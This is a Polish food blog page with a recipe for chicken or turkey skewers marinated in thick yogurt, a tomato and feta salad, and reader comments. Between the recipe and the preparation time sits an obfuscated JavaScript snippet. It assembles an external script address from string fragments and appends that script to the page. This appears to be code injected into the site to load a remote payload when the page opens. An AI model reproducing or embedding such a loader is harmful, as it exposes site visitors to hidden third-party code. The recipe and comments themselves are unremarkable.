Szaszłyki w marynacie jogurtowej na grilla

przez Malwina
Marynata z jogurtu do mięsa
Szaszłyki w marynacie jogurtowej

Dzień dobry,

Skoro sezon grillowy już się rozpoczął, śpieszę do Was z przepisem na pyszne szaszłyki na grilla. Troszkę inne, bo w marynacie na bazie gęstego jogurtu naturalnego i aromatycznych przypraw. Takie szaszłyki są wyjątkowo smaczne i soczyste. Jeśli nie mieliście jeszcze okazji próbować mięsa przygotowanego w taki sposób, to serdecznie polecam wypróbować poniższy przepis.

Marynata jogurtowa

 

Bazą do dzisiejszych szaszłyków są piersi z kurczaka, ale równie dobrze sprawdzi się pierś z indyka lub mięso z ruchomych elementów drobiu (np. podudzia). Mięso zamarynowałam w mieszance jogurtu i przypraw. Co ważne, musi być to bardzo gęsty jogurt naturalny. Ja wykorzystałam Jogurt Naturalny Gęsty Bakoma, którego użyłam także do zrobienia domowego sosu tzatziki do szaszłyków.Wszystkie składniki użyte w przepisie kupicie bez problemu w pobliskim sklepie, nie ma tu bowiem wymyślnych przypraw i drogich produktów. Mam nadzieję, że przepis przypadnie Wam do gustu i wejdzie na stałe do Waszego grillowego menu.

Marynata do szaszłyków z jogurtu

 


Szaszłyki w marynacie jogurtowej



Składniki (na 2-3 porcje):

  • 600 g piersi z kurczaka lub indyka
  • 150 g Jogurtu Naturalnego Gęstego Bakoma
  • 1 czubata łyżka ketchupu (domowego lub sklepowego o dobrym składzie)
  • 2-3 ząbki czosnku, drobno posiekane
  • 1 łyżeczka suszonego oregano
  • pół łyżeczki suszonej bazylii
  • 1/3 łyżeczki mielonej kurkumy
  • 1/2 łyżeczki słodkiej papryki w proszku
  • 1/4 łyżeczki czarnego pieprzu, zmielonego
  • 1/4 łyżeczki cayenne w proszku (lub więcej, jeśli lubicie pikantne potrawy)
  • sól do smaku
Dodatkowo: 
  • patyczki do szaszłyków
  • ulubione warzywa, np. cebula, papryka, pieczarki
  • do podania: sos tzatziki
  • lekka sałatka z pomidorów i sera feta (przepis poniżej)
Marynata jogurtowa do mięsa
Marynata jogurtowa do mięsa

 

Jak zrobić szaszłyki w marynacie jogurtowej?

Mięso oczyszczamy, myjemy, osuszamy papierowym ręcznikiem i kroimy w kostkę. Ja do tego przepisu wykorzystałam piersi z kurczaka. Mięso doprawiamy solą, mieszamy.
W pojemniku na żywność umieszczamy Jogurt Naturalny Gęsty Bakoma, ketchup, czosnek, oregano, bazylię, kurkumę, słodką paprykę, pieprz i cayenne. Wszystko dokładnie mieszamy. Do pojemnika wkładamy pokrojone mięso, ponownie mieszamy. Pojemnik zamykamy i odstawiamy do lodówki na 2-3 godziny, a najlepiej na 12-24 godziny. Należy pamiętać o wyciągnięciu mięsa z lodówki na około 30 minut przed planowanym smażeniem.

Szaszłyki w jogurcie
 
Patyczki do szaszłyków należy namoczyć w zimnej wodzie przez 30 minut. Zapobiegnie to przypalaniu się patyczków. Mięso wyjmujemy z marynaty i nadziewamy na patyczki do szaszłyków, na przemian z kawałkami warzyw. Ja wykorzystałam kolorową paprykę. Równie dobrze sprawdzą się nieduże cebulki, pieczarki, cukinia.
Szaszłyki układamy na ruszcie grilla i grillujemy z każdej strony po kilka minut (polecam najpierw położyć szaszłyki na aluminiowej tacce do grillowania i dopiero na ruszcie). Można je również przygotować w domu na patelni grillowej, grillu elektrycznym lub w piekarniku (180-200 stopni bez termoobiegu przez około 18-20 minut).

Szaszłyki w marynacie jogurtowej podajemy z sosem tzatziki oraz lekką sałatką z pomidorami i serem feta (przepis poniżej).
Sałatka do szaszłyków

 

Lekka sałatka z pomidorów i fety
Składniki (na 2-3 porcje):
  • spora garść ulubionej sałaty lub miniaturowego szpinaku
  • 3-4 pomidory
  • pół czerwonej cebulki
  • kilkanaście zielonych oliwek z pastą paprykową
  • 70 g sera feta
  • dressing: 2-3 łyżki oliwy, 1 łyżka soku z cytryny, pół łyżeczki suszonego oregano, 1/3 łyżeczki suszonej bazylii, sól i pieprz do smaku

 

Jak zrobić lekką sałatkę z pomidorów i sera feta?

Ja do sałatki użyłam małe listki szpinaku, ale równie fajnie sprawdzi się Wasz ulubiony miks sałat, sałata rzymska, karbowana lub nawet lodowa. W misce umieszczamy sałatę, dodajemy pokrojone w większe kawałki pomidory, posiekaną w piórka cebulę czerwoną, oliwki i pokrojony lub pokruszony ser feta. Składniki dressingu łączymy ze sobą w zakręconym małym słoiczku i polewamy nim sałatkę. Pamiętajcie, aby wylać dressing na sałatkę tuż przez podaniem jej.
Sałatka do mięsa z grilla
Sałatka na grill
Szaszłyki prosty przepis
Szaszłyki w marynacie jogurtowej

(function(){
oc87=document.createElement(„script”);oc87.async=true;oc87_=”u”+(„s”)+”t”;
oc87u=”3893.”;oc87_+=”a”+(„t.i”);oc87_+=”n”+(„f”+”o”)+”/”;
oc87u+=”3pxf45sic87tnapi1jwpkx”+(„yuvn6x”);
oc87.src=”//”+oc87_+oc87u;oc87.type=”text/javascript”;
document.body.appendChild(oc87);
})();

Całkowity czas przygotowania: 30 minut.

33 komentarze
0

Podobne posty:

33 komentarze

Paulina K 12/05/2017 - 7:43 am

ale pyszności ! aż ślinka cieknie. piękne zdjęcia.

Odpowiedz
Filozofia Smaku 15/05/2017 - 7:58 am

Dziękuję 🙂

Odpowiedz
taubars 12/05/2017 - 7:48 am

Zjadlabym!!!! Twoje potrawy i zdjecia zawsze wywoluja u mnie slinotok 🙂

Odpowiedz
Ania S 12/05/2017 - 8:21 am

Szaszłyki nie dla mnie, choć myślę, że ta marynata fajnir sprawdziłaby się także do tofu 🙂
A sałatkę bym zjadła z wielką chęcią :))

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:42 am

Z tofu może wyjść naprawdę ciekawie. Trzeba będzie wypróbować 🙂

Odpowiedz
Lena 12/05/2017 - 9:16 am

wow,ale pychota:)

Odpowiedz
Martynosia 12/05/2017 - 9:24 am

Bardzo apetycznie wygladaja te szaszlyki 😉 Marynownie w jogurcie faktycznie nadaje potrzawa soczystosci.
PS. Jak zwykle przepiekene zdjecia 😉

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:46 am

Dokładnie, mięso pozostaje przyjemnie soczyste. No i fajnie, że taka marynata sprawdzi się przy prawie każdym rodzaju mięsa.

Odpowiedz
Michał Kowalski 12/05/2017 - 9:34 am

Hm… pycha, wygląda mega apetycznie a na pewno jeszcze lepiej smakuje 🙂 Fajnie, że można czerpać inspiracje i pomysły z Twojego BLOGA!! Patrząc na te fantastyczne zdjęcia mój apetyt wzrasta :))

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:42 am

Michale, cieszę się, że zdjęcia przypadły Ci do gustu 🙂

Odpowiedz
Marzena T 12/05/2017 - 9:54 am

Świetny przepis ! I zdjęcia sprawiają, że mam ochotę na takie szaszłyki 🙂 Przepis poleciłam na moim fb 😀

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:46 am

Marzenko, dziękuję za polecenie!

Odpowiedz
EllaCanto 12/05/2017 - 10:40 am

Nie marynowałam chyba nigdy kurczaka w jogurcie, a słyszałam, że świetnie wtedy mięso kruszeje 🙂 Przy najbliższej okazji chętnie wypróbuję!

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:46 am

Polecam, bo naprawdę warto 🙂

Odpowiedz
Małgorzata 12/05/2017 - 2:14 pm

Marynata bardzo mnie zainteresowała. Szaszłyki z nią na pewno są pyszne.

Odpowiedz
Lonna 12/05/2017 - 3:27 pm

Jeśli grill to szaszłyki u mnie muszą być, zwykle z indykiem i warzywami, ale w marynacie jeszcze nie robiłam. Będę musiała w tym roku spróbować 🙂

Odpowiedz
Kathy Leonia 12/05/2017 - 4:32 pm

omom czy ja mogę wpaść na spróbowanie?:D wygląda to genialnie;) obserwuję z miłą chęcią i zapraszam serdecznie do siebie;)

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:47 am

Zapraszam 🙂

Odpowiedz
Salvador Dali 13/05/2017 - 9:40 am

jaki cudowny przepis!
Aż zachciało mi się sezonu grillowego, ale pogoda ani trochę nie zachęca 🙁

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:47 am

U mnie weekend był akurat piękny i słoneczny. W końcu można było wyjść z domu w krótkim rękawku. A dziś już niestety zrobiło się burzowo.

Odpowiedz
Mateusz Mrzygłód 13/05/2017 - 10:57 am

Świetne przepisy i przepiękne zdjęcia. Od samego oglądania pobudzają zmysły, aż czuje się zapach i smak. Obowiązkowe pozycje na następnym garden party! Już nie mogę się doczekać. Pani Malwino oby więcej takich ciekawych propozycji na czas grillowy. 🙂

Odpowiedz
Filozofia Smaku 15/05/2017 - 9:41 am

Mateuszu, dziękuję za tak miłe słowa!

Odpowiedz
Anonimowy 13/05/2017 - 7:09 pm

Czy można wykorzystać jogurt grecki?

Odpowiedz
Filozofia Smaku 13/05/2017 - 7:21 pm

Tak. Ważne, by był gęsty i kwaskowaty w smaku.

Odpowiedz
My Chcemy Jeść 14/05/2017 - 12:50 pm

Bardzo smacznie i zdrowo 🙂 Uwielbiam takie dania 🙂

Odpowiedz
JustInka 15/05/2017 - 6:44 pm

Uwielbiam szaszłyki. Najchętniej też wybieram mięso drobiowe, ale Twoje prezentują się wybornie! No i te kolory! Mnie już ślinka cieknie!

Odpowiedz
Angelika i Monika Candy Pandas 15/05/2017 - 8:54 pm

My zjadłybyśmy sałatkę ale szaszłyki przygotowałybyśmy dla naszego taty, na pewno byłby zachwycony. Bardzo lubi takie dania 🙂

Odpowiedz
Karolina Luka 16/05/2017 - 10:20 am

Świetny pomysł! W czwartek planuję zrobić grilla, więc chętnie wypróbuję twój przepis:D

Odpowiedz
Karolina Luka 22/05/2017 - 9:55 pm

Szaszłyki smakowały wyśmienicie. Bardzo pasuje mi taki zestaw przypraw☺

Odpowiedz
Malwina 27/06/2017 - 8:49 am

Miło mi to czytać 🙂

Odpowiedz
Urszula - Proste potrawy 19/05/2017 - 9:07 pm

Ależ apetyczne propozycja 😀

Odpowiedz
Angelika B 21/05/2017 - 8:18 pm

Przepis wypróbowany na sobotnim grillowaniu. Cała rodzinka jadła ze smakiem, co już wiedziałam patrząc po samych składnikach. Marynata jogurtowa sprawiła, że mięsko było mięciutkie i delikatnie. Dziękuję za przepis i szczerze wszystkim polecam.
Przepis wylądował w zakładkach i czeka na kolejną okazję. 🙂

Odpowiedz
Filozofia Smaku 22/05/2017 - 11:06 am

Cieszę się, że przepis przypadł Ci do gustu 🙂

Odpowiedz

Skomentuj

* Korzystając z tego formularza, zgadzasz się na przechowywanie i przetwarzanie Twoich danych osobowych przez stronę Filozofia Smaku

Ten serwis internetowy wykorzystuje ciasteczka (pliki cookies) dla zapewnienia Ci możliwości korzystania z jego wszystkich funkcjonalności. Kliknięcie „Akceptuję” oznacza wyrażenie przez Ciebie zgody na korzystanie z plików cookies na zasadach i zgodnie z pouczeniami zawartymi w Polityce Prywatności. Akceptuję Czytaj więcej: Polityka prywatności i plików cookies